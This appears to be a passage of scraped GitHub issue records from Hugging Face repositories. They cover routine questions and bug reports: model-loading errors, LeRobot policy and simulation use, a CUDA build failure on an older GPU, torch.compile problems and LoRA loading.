100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 6/6 [01:18<00:00, 13.07s/steps]\n11:46:30 - ERROR - Failed to load CogVLM2 model from path: /workspace/STAR/models/cogvlm2-video-llama3-chat\n11:46:30 - ERROR - Exception type: ValueError\n11:46:30 - ERROR - Exception details: `.to` is not supported for `4-bit` or `8-bit` bitsandbytes models. Please use the model as it is, since the model has already been set to the correct devices and casted to the correct `dtype`.\nTraceback (most recent call last):\n File \"/workspace/STAR/logic/cogvlm_utils.py\", line 160, in load_cogvlm_model\n raise model_loading_result[\"error\"]\n File \"/workspace/STAR/logic/cogvlm_utils.py\", line 122, in load_model_thread\n model = AutoModelForCausalLM.from_pretrained(\n File \"/workspace/venv/lib/python3.10/site-packages/transformers/models/auto/auto_factory.py\", line 559, in from_pretrained\n return model_class.from_pretrained(\n File \"/workspace/venv/lib/python3.10/site-packages/transformers/modeling_utils.py\", line 4000, in from_pretrained\n dispatch_model(model, **device_map_kwargs)\n File \"/workspace/venv/lib/python3.10/site-packages/accelerate/big_modeling.py\", line 502, in dispatch_model\n model.to(device)\n File \"/workspace/venv/lib/python3.10/site-packages/transformers/modeling_utils.py\", line 2849, in to\n raise ValueError(\nValueError: `.to` is not supported for `4-bit` or `8-bit` bitsandbytes models. Please use the model as it is, since the model has already been set to the correct devices and casted to the correct `dtype`.\n11:46:30 - ERROR - Error during auto-captioning: 'Could not load CogVLM2 model (check logs for details): `.to` is not supported for `4-bit` or `8-bit` bitsandbytes models. Please use the model as it is, since the model has already been set to the correct devices and casted to the correct `dtype`.'\nTraceback (most recent call last):\n File \"/workspace/STAR/logic/cogvlm_utils.py\", line 160, in load_cogvlm_model\n raise model_loading_result[\"error\"]\n File \"/workspace/STAR/logic/cogvlm_utils.py\", line 122, in load_model_thread\n model = AutoMode", "url": "https://github.com/huggingface/transformers/issues/39336", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-10T11:49:02Z", "updated_at": "2025-08-18T08:03:13Z", "comments": 4, "user": "FurkanGozukara" }, { "repo": "huggingface/lerobot", "number": 1476, "title": "Here as interactive gym to play with the robot, (I still need some help)", "body": "### First the good news:\nThis is an interactive gym where you can experiment with pre-trained policies to control the robot in real time. \nHere is how to use it:\n- `Double-click` on a body to select it.\n- `Ctrl + left` drag applies a torque to the selected object, resulting in rotation.\n- `Ctrl + right` drag applies a force to the selected object in the (x,z) plane, resulting in translation.\n- `Ctrl + Shift + right` drag applies a force to the selected object in the (x,y) plane.\n\n\n### However, there are a few limitations:\n\n- When you move the cubes, the robot doesn't seem to register the new positions and instead attempts to pick them up from their original locations.\n- **Only** the environment `lerobot/act_aloha_sim_insertion_human` appears to work occasionally. The others either don't function at all or cause the program to crash due to missing attributes that haven't been implemented in the gym.\n\nI'd really appreciate feedback/guidance from the repo maintainers on how to improve this snippet to support more environments and tasks.\n\nfile `interactive_gym.py`:\n```python\nimport gymnasium as gym\nimport mujoco\nimport mujoco.viewer\nimport torch\nimport importlib\nfrom lerobot.policies.utils import get_device_from_parameters\nfrom lerobot.configs import parser\nfrom lerobot.configs.eval import EvalPipelineConfig\nfrom lerobot.policies.factory import make_policy\nfrom lerobot.envs.utils import preprocess_observation\nfrom lerobot.utils.utils import get_safe_torch_device\n\n\n# $ python interactive_gym.py --policy.path=lerobot/act_aloha_sim_insertion_human --env.type=aloha\n# $ python interactive_gym.py --policy.path=lerobot/act_aloha_sim_transfer_cube_human --env.type=aloha\n\n@parser.wrap()\ndef make_env_and_policy(cfg: EvalPipelineConfig):\n package_name = f\"gym_{cfg.env.type}\"\n\n try:\n importlib.import_module(package_name)\n except ModuleNotFoundError as e:\n print(f\"{package_name} is not installed. Please install it with `pip install 'lerobot[{cfg.env.type}]'`\")\n raise e\n\n gym_handle = f\"{package_name}/{cfg.env.task}\"\n\n env = gym.make(gym_handle, disable_env_checker=True, **cfg.env.gym_kwargs)\n\n policy = make_policy(cfg=cfg.policy, env_cfg=cfg.env)\n policy.eval() \n policy.reset()\n\n return env, policy\n\n\ndef main(env, policy):\n device = get_device_from_parameters(policy)\n\n viewer = mujoco.viewer.launch_passive(env.unwrapped.model, env.unwrapped.data)\n\n observation, info = env.reset(seed=42)\n viewer.sync()\n\n for i in range(40000):\n observation = preprocess_observation(observation)\n observation = {\n key: observation[key].to(device, non_blocking=device.type == \"cuda\") for key in observation\n }\n\n # Infer \"task\" from attributes of environments.\n # TODO: works with SyncVectorEnv but not AsyncVectorEnv\n if hasattr(env, \"task_description\"):\n observation[\"task\"] = env.unwrapped.task_description\n elif hasattr(env, \"task\"):\n observation[\"task\"] = env.unwrapped.task\n else: # For envs without language instructions, e.g. aloha transfer cube and etc.\n observation[\"task\"] = \"\"\n\n with torch.inference_mode():\n action = policy.select_action(observation)\n\n # Convert to CPU / numpy.\n action = action.to(\"cpu\").numpy()\n assert action.ndim == 2, \"Action dimensions should be (batch, action_dim)\"\n\n # Apply the next action.\n #observation, reward, terminated, truncated, info = env.step(action)\n\n observation, reward, terminated, truncated, info = env.step(action[0])\n viewer.sync()\n \n if terminated or truncated:\n observation, info = env.reset()\n viewer.sync()\n \n if i % 100 == 0:\n print(i)\n\n viewer.close()\n env.close()\n\ntorch.backends.cudnn.benchmark = True\ntorch.backends.cuda.matmul.allow_tf32 = True\n\nenv, policy = make_env_and_policy()\nmain(env, policy)\n```\n\n", "url": "https://github.com/huggingface/lerobot/issues/1476", "state": "open", "labels": [ "question", "simulation" ], "created_at": "2025-07-09T14:59:22Z", "updated_at": "2025-12-16T13:41:00Z", "user": "raul-machine-learning" }, { "repo": "huggingface/lerobot", "number": 1475, "title": "[Question] What does each number in predicted action(SmolVLA) stand for?", "body": "Hi, I'm trying to load the SmolVLA and test on my simulation env. \n\nAfter passing the observations to the model using \"policy.select_action(obs)\" I got a 6-dimensional action, but I'm quite confused about what exactly they are. And if there are three for position translation and three for rotation, how could I control the open and close for the gripper?\n\nThanks.", "url": "https://github.com/huggingface/lerobot/issues/1475", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-09T13:39:25Z", "updated_at": "2025-08-12T10:08:26Z", "user": "Calvert0921" }, { "repo": "huggingface/lerobot", "number": 1471, "title": "where is 7_get_started_with_real_robot.md?", "body": "I didn't find 7_get_started_with_real_robot.md", "url": "https://github.com/huggingface/lerobot/issues/1471", "state": "closed", "labels": [ "documentation", "question" ], "created_at": "2025-07-09T08:02:32Z", "updated_at": "2025-10-08T08:42:21Z", "user": "von63" }, { "repo": "huggingface/alignment-handbook", "number": 218, "title": "Will you release SmolLM 3 recipe?", "body": "First off, thank you so much for sharing these training resources.\n\nI was wondering if, with the recent release of SmolLM3, you have plans to also share its training recipe.\n\nHave a nice day!", "url": "https://github.com/huggingface/alignment-handbook/issues/218", "state": "closed", "labels": [], "created_at": "2025-07-08T19:47:20Z", "updated_at": "2025-07-15T14:16:11Z", "comments": 1, "user": "ouhenio" }, { "repo": "huggingface/sentence-transformers", "number": 3433, "title": "How to use a custom batch sampler?", "body": "`SentenceTransformerTrainer.__init__` will check the type of args, so I have to write a class inheriting from `SentenceTransformerTrainingArgs` rather than `TransformerTrainingArgs`. The problem is that `SentenceTransformerTrainingArgs.__post__init__` forces to use `BatchSampler` to initialize a batch sampler. Is there any workaround about this? ", "url": "https://github.com/huggingface/sentence-transformers/issues/3433", "state": "open", "labels": [], "created_at": "2025-07-08T09:35:24Z", "updated_at": "2025-07-08T12:36:33Z", "user": "Hypothesis-Z" }, { "repo": "huggingface/transformers", "number": 39266, "title": "Unable to create tensor, you should probably activate truncation and/or padding with 'padding=True' 'truncation=True' to have batched tensors with the same length.", "body": "### System Info\n\n```bash\nTraceback (most recent call last):\n File \"/home/cx/miniconda3/envs/demo/lib/python3.10/site-packages/transformers/tokenization_utils_base.py\", line 767, in convert_to_tensors\n tensor = as_tensor(value)\n File \"/home/cx/miniconda3/envs/demo/lib/python3.10/site-packages/transformers/tokenization_utils_base.py\", line 729, in as_tensor\n return torch.tensor(value)\nValueError: expected sequence of length 15757 at dim 1 (got 16242)\n```\n*DataCollatorForLanguageModeling* seems to only padding input ids and ignore labels, resulting in different lengths of labels in a batch. Why is this?\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\ndef _process_fn(samples, tokenizer : PreTrainedTokenizerFast, config):\n samples = [[{\"role\" : \"user\", \"content\" : x[0]}, {\"role\" : \"assistant\", \"content\" : x[1]}]\n for x in zip(samples[\"input\"], samples[\"output\"])]\n # tokenized_data = tokenizer.apply_chat_template(samples, \n # return_tensors=\"pt\",\n # return_dict=True,\n # padding=\"max_length\",\n # truncation=True,\n # max_length=8000)\n tokenized_data = tokenizer.apply_chat_template(samples, \n return_tensors=\"pt\",\n return_dict=True,\n padding=True\n )\n samples_ids = tokenized_data[\"input_ids\"]\n attention_mask = tokenized_data[\"attention_mask\"]\n output_ids = []\n for i, seq in enumerate(samples_ids):\n output_index = torch.where(seq == SPECIAL_GENERATE_TOKEN_ID)[0]\n mask = attention_mask[i]\n if len(output_index) == 1:\n output_index = output_index[0].item()\n else:\n continue\n temp = torch.full_like(seq, -100)\n temp[output_index:] = seq[output_index:]\n temp[mask == 0] = -100\n output_ids.append(temp)\n\n labels = torch.stack(output_ids)\n return {\"input_ids\" : samples_ids,\n \"labels\" : labels,\n \"attention_mask\" : attention_mask}\n\ntrainer = Trainer(\n model=peft_model,\n args=train_config,\n train_dataset=train_data,\n eval_dataset=eval_data,\n data_collator=DataCollatorForLanguageModeling(\n tokenizer=tokenizer,\n mlm=False,\n pad_to_multiple_of=8 if torch.cuda.is_available() else None,\n return_tensors=\"pt\"\n )\n )\n```\n\n\n### Expected behavior\n\nrun code", "url": "https://github.com/huggingface/transformers/issues/39266", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-08T05:19:35Z", "updated_at": "2025-07-08T06:50:47Z", "comments": 0, "user": "mumu029" }, { "repo": "huggingface/lerobot", "number": 1460, "title": "How to support dataloading with historical cue?", "body": "as i see, the getitem function of LerobotDataset now returns the single frame data, how to stack the historical frames and make use of batch data with historical information like univla?\n", "url": "https://github.com/huggingface/lerobot/issues/1460", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-07-08T01:49:11Z", "updated_at": "2025-08-12T09:44:02Z", "user": "joeyxin-del" }, { "repo": "huggingface/lerobot", "number": 1458, "title": "how to control a real robot arm-101 with my own pretrained model?", "body": "I don't see the instruction or script example on this repository\u3002\nPlease help\n\nThanks,\n", "url": "https://github.com/huggingface/lerobot/issues/1458", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-08T01:19:50Z", "updated_at": "2025-08-12T09:45:13Z", "user": "jcl2023" }, { "repo": "huggingface/candle", "number": 3016, "title": "Build fails on Maxwell GPU due to __dp4a undefined in quantized.cu", "body": "I\u2019m trying to build a Rust project locally that depends on candle-kernels on my laptop with an NVIDIA GeForce 940MX (Maxwell, compute capability 5.0). The build fails with errors like:\n\n```\n\nsrc/quantized.cu(1997): error: identifier \"__dp4a\" is undefined\n...\n18 errors detected in the compilation of \"src/quantized.cu\".\n\n```\n\nGPU: NVIDIA GeForce 940MX (GM107, compute capability 5.0)\nOS: Kali Linux (rolling)\nCUDA toolkit: 12.3\nNVIDIA driver: 550.163.01\ncandle-kernels: v0.7.2\n\n\nThe error is caused by the use of the CUDA intrinsic __dp4a, which is only available on GPUs with compute capability 6.1+ (Pascal and newer).\nMy GPU is compute 5.0, so this intrinsic is not available.\n\n**Questions:**\nIs there a way to disable quantized kernels or the use of __dp4a for older GPUs?\nIf not, could a feature flag or build option be added to support older hardware, or at least skip building quantized kernels on unsupported GPUs?\n", "url": "https://github.com/huggingface/candle/issues/3016", "state": "open", "labels": [], "created_at": "2025-07-07T14:41:53Z", "updated_at": "2025-07-07T14:41:53Z", "comments": 0, "user": "fishonamos" }, { "repo": "huggingface/text-generation-inference", "number": 3289, "title": "How to detect watermark?", "body": "Hi,\n\nThanks for the great work.\n\nI saw in the current code the KGW watermark is implemented. But it seems lack of code to evaluate and detect whether the generated text contains watermark.\n\nCould anyone suggest whether this code is exists? It will be very helpful.\n\nThanks", "url": "https://github.com/huggingface/text-generation-inference/issues/3289", "state": "open", "labels": [], "created_at": "2025-07-07T11:42:54Z", "updated_at": "2025-07-07T11:42:54Z", "user": "Allencheng97" }, { "repo": "huggingface/lerobot", "number": 1448, "title": "How to specify both policy.type and pretrained path at the same time?", "body": "Hi, I am adding custom configs to a PreTrainedConfig, and I also want to load it from a pretrained path. However, if I specify the pretrained path (with policy.path), I won't be able to modify the fields inside the new PreTrainedConfig subclass. If I use policy.type=\"myNewModel\" instead, I am able to call the fields (such as `policy.new_field_in_myNewModel` when I run `lerobot/scripts/train.py`, but unable to specify the pretrained path.\n\nWhat is a good solution to this problem? \n\nThanks!", "url": "https://github.com/huggingface/lerobot/issues/1448", "state": "open", "labels": [ "enhancement", "configuration" ], "created_at": "2025-07-07T03:33:15Z", "updated_at": "2025-08-12T09:45:58Z", "user": "branyang02" }, { "repo": "huggingface/lerobot", "number": 1447, "title": "SmolVLA input/output clarification", "body": "I'm now trying to load the SmolVLA to control the Franka arm in simulation. I found that there could be three image inputs(Obeservation.image, 1 and 2) and I have top, wrist and side views. Is there a fixed order for those camera views?\n\nAnd the predicted action has 6 dimensions, does that mean it doesn't include the gripper state? What are those values represent for? Thanks in advance!", "url": "https://github.com/huggingface/lerobot/issues/1447", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-07-06T21:56:43Z", "updated_at": "2025-10-09T21:59:17Z", "user": "Calvert0921" }, { "repo": "huggingface/lerobot", "number": 1446, "title": "How to evaluate finetuned SmolVLA model", "body": "Dear authors and your wonderful work.\nI have fine-tuned the smolvla model based on a customized lerobot format dataset. My dataset is picking up a banana and placing it on a box. How can I evaluate the performance of the model? I tried eval.py in the scripes directory, but env_type=pusht doesn't work. I think this env_type may cause eval.py to fail to run.\nI hope someone can help me. Thanks in advance.\n", "url": "https://github.com/huggingface/lerobot/issues/1446", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-07-06T15:27:22Z", "updated_at": "2025-10-17T11:57:49Z", "user": "BintaoBryant" }, { "repo": "huggingface/diffusers", "number": 11865, "title": "AttributeError: type object 'CosmosTransformer3DModel' has no attribute 'from_single_file'", "body": "### Describe the bug\n\nI would like to run the Cosmos-Predict2-14B-Text2Image model, but it is too large to fit in 24GB of VRAM normally, so I tried to load a Q8_0 GGUF quantization. I copied some code from the [HiDreamImageTransformer2DModel](https://huggingface.co/docs/diffusers/en/api/models/hidream_image_transformer#loading-gguf-quantized-checkpoints-for-hidream-i1) page and tried to adapt it, but I get the following error:\n\n`AttributeError: type object 'CosmosTransformer3DModel' has no attribute 'from_single_file'`\n\nIs there supposed to be another way to load a 8 bit quantization? From what I have seen, Q8_0 typically produces results that are much closer to full precision compared to FP8.\n\n### Reproduction\n\n```\ntransformer = CosmosTransformer3DModel.from_single_file(\n rf\"{model_14b_id}\\cosmos-predict2-14b-text2image-Q8_0.gguf\",\n quantization_config=GGUFQuantizationConfig(compute_dtype=torch.bfloat16),\n torch_dtype=torch.bfloat16\n)\npipe_14b = Cosmos2TextToImagePipeline.from_pretrained(\n model_14b_id,\n torch_dtype=torch.bfloat16,\n transformer = transformer\n)\n```\n\n### Logs\n\n```shell\n transformer = CosmosTransformer3DModel.from_single_file(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nAttributeError: type object 'CosmosTransformer3DModel' has no attribute 'from_single_file'\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.35.0.dev0\n- Platform: Windows-10-10.0.26100-SP0\n- Running on Google Colab?: No\n- Python version: 3.11.9\n- PyTorch version (GPU?): 2.7.1+cu128 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.33.1\n- Transformers version: 4.53.0\n- Accelerate version: 1.8.1\n- PEFT version: 0.15.2\n- Bitsandbytes version: 0.46.1\n- Safetensors version: 0.5.3\n- xFormers version: not installed\n- Accelerator: NVIDIA GeForce RTX 4090, 24564 MiB\n- Using GPU in script?: Yes\n- Using distributed or parallel set-up in script?: No\n\n\n### Who can help?\n\n@DN6 ", "url": "https://github.com/huggingface/diffusers/issues/11865", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-05T12:14:50Z", "updated_at": "2025-07-11T07:15:23Z", "comments": 9, "user": "mingyi456" }, { "repo": "huggingface/diffusers", "number": 11864, "title": "AutoencoderDC.encode fails with torch.compile(fullgraph=True) - \"name 'torch' is not defined\"", "body": "### Describe the bug\n\nI'm trying to optimize my data preprocessing pipeline for the Sana model by using `torch.compile` on the DC-AE encoder. Following PyTorch's best practices, I attempted to compile only the `encode` method with `fullgraph=True` for better performance, but I'm encountering an error.\n\nWhen I try:\n```python\ndae.encode = torch.compile(dae.encode, fullgraph=True)\n```\n\nThe code fails with `NameError: name 'torch' is not defined` when calling `dae.encode(x)`.\n\nHowever, compiling the entire model works:\n```python\ndae = torch.compile(dae, fullgraph=True)\n```\n\nI'm unsure if this is expected behavior or if I'm doing something wrong. Is there a recommended way to compile just the encode method for `AutoencoderDC`? \n\nI was advised to use the more targeted approach of compiling only the encode method for better performance, but it seems like the DC-AE model might have some internal structure that prevents this optimization pattern.\n\nAny guidance on the correct way to apply `torch.compile` optimizations to `AutoencoderDC` would be greatly appreciated. Should I stick with compiling the entire model, or is there a way to make method-level compilation work?\n\n\n### Reproduction\n\n```\nimport torch\nfrom diffusers import AutoencoderDC\n\n# Load model\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ndae = AutoencoderDC.from_pretrained(\n \"mit-han-lab/dc-ae-f32c32-sana-1.1-diffusers\",\n torch_dtype=torch.bfloat16\n).to(device).eval()\n\n# This fails with \"name 'torch' is not defined\"\ndae.encode = torch.compile(dae.encode, fullgraph=True)\n\n# Test\nx = torch.randn(1, 3, 512, 512, device=device, dtype=torch.bfloat16)\nout = dae.encode(x) # Error occurs here\n# This works fine\ndae = torch.compile(dae, fullgraph=True)\n```\n\n### Logs\n\n```shell\nTesting torch.compile(dae.encode, fullgraph=True)\n/data1/tzz/anaconda_dir/envs/Sana/lib/python3.10/site-packages/torch/_inductor/compile_fx.py:150: UserWarning: TensorFloat32 tensor cores for float32 matrix multiplication available but not enabled. Consider setting `torch.set_float32_matmul_precision('high')` for better performance.\n warnings.warn(\n \u2717 Error: name 'torch' is not defined\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.34.0.dev0\n- Platform: Linux-5.15.0-142-generic-x86_64-with-glibc2.35\n- Running on Google Colab?: No\n- Python version: 3.10.18\n- PyTorch version (GPU?): 2.4.0+cu121 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.33.0\n- Transformers version: 4.45.2\n- Accelerate version: 1.7.0\n- PEFT version: 0.15.2\n- Bitsandbytes version: 0.46.0\n- Safetensors version: 0.5.3\n- xFormers version: 0.0.27.post2\n- Accelerator: NVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\n- Using GPU in script?: yes\n- Using distributed or parallel set-up in script?: no\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/11864", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-05T06:15:11Z", "updated_at": "2025-07-09T01:32:39Z", "comments": 6, "user": "SingleBicycle" }, { "repo": "huggingface/datasets", "number": 7669, "title": "How can I add my custom data to huggingface datasets", "body": "I want to add my custom dataset in huggingface dataset. Please guide me how to achieve that.", "url": "https://github.com/huggingface/datasets/issues/7669", "state": "open", "labels": [], "created_at": "2025-07-04T19:19:54Z", "updated_at": "2025-07-05T18:19:37Z", "user": "xiagod" }, { "repo": "huggingface/lerobot", "number": 1442, "title": "Trained pi0 policy ignores visual cues", "body": "I am having an issue in which my trained pi0 policy looks smooth but it completely ignores the camera input. I have tried covering up a camera and the policy still looks smooth! This seems very wrong. I wonder if it is because my images are not normalized correctly? Has anyone else seen this?\n\n Do i need to change the \"NormalizationMode\" visual for pi0? Seems like this may be a repeat of https://github.com/huggingface/lerobot/issues/1065? \n\n", "url": "https://github.com/huggingface/lerobot/issues/1442", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-03T20:13:08Z", "updated_at": "2025-08-12T09:47:09Z", "user": "kumarhans" }, { "repo": "huggingface/lerobot", "number": 1439, "title": "[QUESTION] run a policy on a real robot", "body": "Hi There, In the documentation , scripts to teleoperate, record, replay or evaluate a policy are provided **but how to run a policy for inference only on a real robot** ? I did not find such a script? \n\nBesides it may be interesting to add such a script in the documentation as well\n\nThank you very much for your help\n", "url": "https://github.com/huggingface/lerobot/issues/1439", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-03T18:09:10Z", "updated_at": "2025-08-12T09:47:27Z", "user": "FaboNo" }, { "repo": "huggingface/smolagents", "number": 1512, "title": "How can we use this benchmark to evaluate local models?", "body": "examples/smolagents_benchmark/run.py\n\n", "url": "https://github.com/huggingface/smolagents/issues/1512", "state": "closed", "labels": [ "enhancement" ], "created_at": "2025-07-03T06:17:58Z", "updated_at": "2025-07-03T08:07:26Z", "user": "OoOPenN" }, { "repo": "huggingface/diffusers", "number": 11849, "title": "Can not load fusionx_lora into original wan2.1-14b", "body": "hello, i am adding the fusionx_lora into original wan2.1-14b-i2v, my code is as follow:\n\n> pipe = WanImageToVideoPipeline.from_pretrained(my_local_path + \"Wan2.1-I2V-14B-480P-Diffusers\", vae=vae, image_encoder=image_encoder, torch_dtype=torch.bfloat16)\n> pipe.load_lora_weights(\n> my_local_path + \"Wan14BT2VFusioniX/FusionX_LoRa/Wan2.1_I2V_14B_FusionX_LoRA.safetensors\"\n> )\n\nBut i got some errors:\n\n \n\n> File \"/mmu_mllm_hdd_2/zuofei/infer_test/lora_infer_multi.py\", line 60, in process_image\n> pipe.load_lora_weights(\n> File \"/hetu_group/zuofei/env/wan_infer/lib/python3.12/site-packages/diffusers/loaders/lora_pipeline.py\", line 4869, in load_lora_weights\n> state_dict = self.lora_state_dict(pretrained_model_name_or_path_or_dict, **kwargs)\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n> File \"/hetu_group/zuofei/env/wan_infer/lib/python3.12/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\n> return fn(*args, **kwargs)\n> ^^^^^^^^^^^^^^^^^^^\n> File \"/hetu_group/zuofei/env/wan_infer/lib/python3.12/site-packages/diffusers/loaders/lora_pipeline.py\", line 4796, in lora_state_dict\n> state_dict = _convert_non_diffusers_wan_lora_to_diffusers(state_dict)\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n> File \"/hetu_group/zuofei/env/wan_infer/lib/python3.12/site-packages/diffusers/loaders/lora_conversion_utils.py\", line 1564, in _convert_non_diffusers_wan_lora_to_diffusers\n> num_blocks = len({k.split(\"blocks.\")[1].split(\".\")[0] for k in original_state_dict})\n> ~~~~~~~~~~~~~~~~~~^^^\n> IndexError: list index out of range\n\nCan you tell me how to fix it? Thank you so much!", "url": "https://github.com/huggingface/diffusers/issues/11849", "state": "open", "labels": [], "created_at": "2025-07-02T13:48:17Z", "updated_at": "2025-07-02T13:48:17Z", "comments": 0, "user": "fzuo1230" }, { "repo": "huggingface/transformers", "number": 39169, "title": "Using Gemma3n with text-only generation requires image dependencies", "body": "### System Info\n\n- `transformers` version: 4.53.0\n- Platform: macOS-15.5-arm64-arm-64bit\n- Python version: 3.12.8\n- Huggingface_hub version: 0.33.2\n- Safetensors version: 0.5.3\n- Accelerate version: not installed\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.7.1 (NA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n@zucchini-nlp \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nI want to use the Gemma3n model in a text-only generation pipeline (without any multimodal inputs). I'm using the Gemma3nForCausalLM because it has only a language modeling head. But when running the script, it fails with an ImportError stating that `AutoImageProcessor` requires the PIL and timm libraries to work. How can I run Gemma3n for text-generation without those image-related dependencies?\n\n```python\nfrom transformers import AutoTokenizer, Gemma3nForCausalLM\nimport torch\n\nmodel_id = \"google/gemma-3n-e4b\"\n\nmodel = Gemma3nForCausalLM.from_pretrained(model_id)\ntokenizer = AutoTokenizer.from_pretrained(model_id)\n\nprompt = \"Once upon a time\"\ninputs = tokenizer(prompt, return_tensors=\"pt\").to(model.device)\noutput = model.generate(**inputs, max_length=30)\n\nresponse = tokenizer.decode(output[0], skip_special_tokens=True)\n\nprint(response)\n```\n\n### Expected behavior\n\nI expect the script to run successfully without installing `pillow` and `timm`.", "url": "https://github.com/huggingface/transformers/issues/39169", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-02T07:46:43Z", "updated_at": "2025-08-01T08:14:26Z", "comments": 6, "user": "marianheinsen" }, { "repo": "huggingface/lerobot", "number": 1429, "title": "When will release the SmolVLA(2.25B & 0.24b)", "body": "Hi dear authors \nthx for ur all and the wonderful work - SmolVLA!\nI wonder will u release the **SmolVLA(2.25B)?** I want to compare the performance with your release version(0.45B)", "url": "https://github.com/huggingface/lerobot/issues/1429", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-07-02T03:39:06Z", "updated_at": "2025-10-11T07:21:57Z", "user": "JuilieZ" }, { "repo": "huggingface/sentence-transformers", "number": 3416, "title": "How to calculate prompt tokens for embedding model encode?", "body": "I want to calculate input prompt tokens, which returns to user to let them know how many tokens they consumed. How can I do that? Could you give me an example?", "url": "https://github.com/huggingface/sentence-transformers/issues/3416", "state": "open", "labels": [], "created_at": "2025-07-02T03:27:11Z", "updated_at": "2025-07-03T07:02:55Z", "user": "gaoxt1983" }, { "repo": "huggingface/sentence-transformers", "number": 3414, "title": "How to fine tune multimodal embedding model?", "body": "Hi @tomaarsen and Team - hope all is well & thanks for the work.\n\nI used to fine tune some pure text based embedding models using this package and now I would like to fine tune multimodal embedding models such as `llamaindex/vdr-2b-multi-v1` and `jinaai/jina-embeddings-v4`.\n\nI wonder if you can share some insights / relevant documentation / code examples?\n\nThank you.", "url": "https://github.com/huggingface/sentence-transformers/issues/3414", "state": "open", "labels": [], "created_at": "2025-07-01T23:45:04Z", "updated_at": "2025-07-03T10:25:29Z", "user": "groklab" }, { "repo": "huggingface/lerobot", "number": 1424, "title": "evaluated trained policy reports 14 pc_success only", "body": "Trained act policy using \n\n```\npython lerobot/scripts/train.py \\\n --policy.type=act \\\n --dataset.repo_id=lerobot/act_aloha_sim_insertion_human \\\n --env.type=aloha \\\n --output_dir=outputs/train/act_aloha_insertion\n```\n\nQuestion: I think I mistakenly used the prefix `act_` in the `repo_id` but if I don't use it I get this error:\n\n```\n$ python lerobot/scripts/train.py --policy.type=act --dataset.repo_id=lerobot/aloha_sim_insertion_human --env.type=aloha --output_dir=outputs/train/act_aloha_insertion\nINFO 2025-07-01 05:47:32 ils/utils.py:48 Cuda backend detected, using cuda.\nWARNING 2025-07-01 05:47:32 /policies.py:77 Device 'None' is not available. Switching to 'cuda'.\nTraceback (most recent call last):\n File \"/home/user/lerobot/lerobot/scripts/train.py\", line 291, in \n train()\n File \"/home/user/lerobot/lerobot/configs/parser.py\", line 226, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/home/user/lerobot/lerobot/scripts/train.py\", line 110, in train\n cfg.validate()\n File \"/home/user/lerobot/lerobot/configs/train.py\", line 120, in validate\n raise ValueError(\nValueError: 'policy.repo_id' argument missing. Please specify it to push the model to the hub.\n```\n\nUsing that \"act_\" prefix in the repo id I attempted to Evaluate it using the command below but it reports `pc_success` being 14% which seems too low?\n\n```\n python lerobot/scripts/eval.py \\\n--policy.path=outputs/train/act_aloha_insertion/checkpoints/last/pretrained_model \\\n--env.type=aloha \\\n--eval.batch_size=10 \\\n--eval.n_episodes=50 \n```\n\nDetailed output of the above command:\n\n```\n$ python lerobot/scripts/eval.py --policy.path=outputs/train/act_aloha_insertion/checkpoints/last/pretrained_model --env.type=aloha --eval.batch_size=10 